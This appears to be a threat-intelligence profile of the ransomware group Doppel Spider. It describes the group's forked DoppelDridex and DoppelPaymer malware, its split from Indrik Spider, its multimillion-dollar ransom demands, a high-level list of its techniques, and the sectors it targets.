Eastern Europe, Russian Federation
Doppel Spider is a criminal actor group that has been operating since circa April 2019 and is responsible for the operation of the malware families named DoppelDridex and DoppelPaymer.
CrowdStrike Intelligence identified that DoppelPaymer is based on a fork of the BitPaymer source code and DoppelDridex is a modified version of the Dridex malware. BitPaymer and Dridex are developed and operated by the criminal actor Indrik Spider.
DoppelDridex is a fork of Indrik Spider Dridex malware. DoppelDridex is being run as a parallel operation to Dridex with a different malware versioning system, different RSA key, and with different infrastructure. In June 2019, parallel operations of BitPaymer and DoppelPaymer were identified and, coupled with the significant code overlap between the two ransomwares, indicate not only a fork of the BitPaymer code base, but two entirely separate operations.
CrowdStrike Intelligence assesses with high confidence that Doppel Spider has splintered from Indrik Spider and is now using forked malware code to run their own Big Game Hunting operations.
Doppel Spider has become increasingly bold in their ransom demands through 2020 with ransoms often equating to several millions of USD and, in at least one case during 2020, requesting over $1B USD.
- P2P communications
- DoppelDridex uses XOR/RSA/RC4 encryption
- Use of Dridex modules during compromise of the victim’s network
- Use of services to launch PowerShell Empire downloader scripts
United Arab Emirates
- Consulting & Professional Services
- Consumer Goods
- Food and Beverage
- Industrials and Engineering
- Media, NGOs and Nonprofits
- Oil and Gas
- Real Estate